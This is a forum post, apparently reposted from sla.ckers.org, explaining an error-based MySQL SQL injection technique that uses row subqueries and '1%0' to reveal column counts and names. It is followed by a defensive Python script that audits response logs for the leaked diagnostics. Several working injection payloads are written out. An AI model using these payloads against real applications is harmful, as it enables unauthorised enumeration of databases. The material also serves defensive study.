Reservists Of Antichat - Level 6
Registered: 16.07.2005
Posts: 653
With us:
10957346
Reputation:
2727
MYSQL - Retrieving some column's name using Row SubQueries
Mods, please clean the junk out of this thread.
http://sla.ckers.org/forum/read.php?16,32472
MYSQL - Retrieving some column's name using Row SubQueries
Posted by: Paic (IP Logged)
Date: November 25, 2009 11:56AM
Hi,
I've recently found an interesting way of retrieving column names from tables other than the one used in the query when the information_schema table is not accessible. It assumes you've already found some table's name.
It is using the 1%0 trick and MySQL subqueries.
Maybe you all know about that but I would like to share it!
I was playing around with sql subqueries when I've found something very interesting: "Row Subqueries"
You'd better read this in order to understand what's next:
[dev.mysql.com]
The hint is "The row constructor and the row returned by the subquery must contain the same number of values."
Ok, imagine you have the table USER_TABLE. You don't have any other information than the table's name.
The sql query is expecting only one row as result.
Here is our input:
' AND (SELECT * FROM USER_TABLE) = (1);
MySQL answer:
"Operand should contain 7 column(s)"
MySQL told us that the table USER_TABLE has 7 columns! That's great!
Now we can use the UNION and 1%0 to retrieve some column names:
The following query shouldn't give you any error:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4,5,6,7 LIMIT 1);
Now let's try with the first column, simply add %0 to the first column in the UNION:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1%0,2,3,4,5,6,7 LIMIT 1);
MySQL answer:
"Column 'usr_u_id' cannot be null"
We've got the first column name: "usr_u_id"
Then we proceed with the other columns...
Example with the 4th column:
' AND (1,2,3,4,5,6,7) = (SELECT * FROM USER_TABLE UNION SELECT 1,2,3,4%0,5,6,7 LIMIT 1);
If MySQL doesn't reply with an error message, this is just because the column can be empty and you won't be able to get its name!
Paic
__________________
PEW-PEW...
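The whole technique quoted above only works because the two MySQL diagnostics ("Operand should contain N column(s)" and "Column 'X' cannot be null") are echoed back to the client. The following is an added defender-side example, not code from the sla.ckers post or from Paic: it scans a constructed set of logged response bodies for exactly those diagnostics, aggregates what a client could have learned from them (column count and column names), and shows the generic message the application should have returned instead. The sample bodies, request ids and the column name usr_email are constructed for the example; only usr_u_id and the error strings come from the post.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample of response bodies as a web application might log them.
# Hypothetical data: only 'usr_u_id' and the two error strings come from the post.
SAMPLE_RESPONSES: List[Tuple[str, str]] = [
    ("r1", "<html>Welcome back</html>"),
    ("r2", "Error: Operand should contain 7 column(s)"),
    ("r3", "Error: Column 'usr_u_id' cannot be null"),
    ("r4", "Error: Column 'usr_email' cannot be null"),
    ("r5", "<html>No results</html>"),
]

# The two MySQL diagnostics the post relies on. Either one reaching a client
# is a leak: the first discloses a table's column count, the second a column name.
COLUMN_COUNT_RE = re.compile(r"Operand should contain (\d+) column\(s\)")
COLUMN_NAME_RE = re.compile(r"Column '([^']+)' cannot be null")


@dataclass
class LeakReport:
    """What a client could reconstruct from the leaked diagnostics."""
    column_count: Optional[int] = None
    column_names: List[str] = field(default_factory=list)
    leaking_requests: List[str] = field(default_factory=list)


def classify(body: str) -> Optional[Tuple[str, object]]:
    """Return ('count', n), ('name', column) or None for one response body."""
    m = COLUMN_COUNT_RE.search(body)
    if m:
        return ("count", int(m.group(1)))
    m = COLUMN_NAME_RE.search(body)
    if m:
        return ("name", m.group(1))
    return None


def audit(responses: List[Tuple[str, str]]) -> LeakReport:
    """Aggregate the disclosed schema details across a batch of responses."""
    report = LeakReport()
    for req_id, body in responses:
        hit = classify(body)
        if hit is None:
            continue
        report.leaking_requests.append(req_id)
        kind, value = hit
        if kind == "count":
            report.column_count = int(value)
        elif value not in report.column_names:
            report.column_names.append(str(value))
    return report


def safe_error_body(body: str) -> str:
    """The body the client should receive: a generic message whenever a MySQL
    diagnostic would otherwise be echoed. The detailed error belongs in the
    server-side log, not in the response."""
    if classify(body) is not None:
        return "An internal error occurred."
    return body


if __name__ == "__main__":
    report = audit(SAMPLE_RESPONSES)
    print(f"leaking requests: {report.leaking_requests}")
    print(f"disclosed column count: {report.column_count}")
    print(f"disclosed column names: {report.column_names}")
```

Running the audit over real response logs tells you how much of a table's layout has already been handed out; the lasting fix is to stop the diagnostics at the application boundary (generic error page, details logged server-side) and to build the query with bound parameters so the injected row subquery never reaches MySQL in the first place.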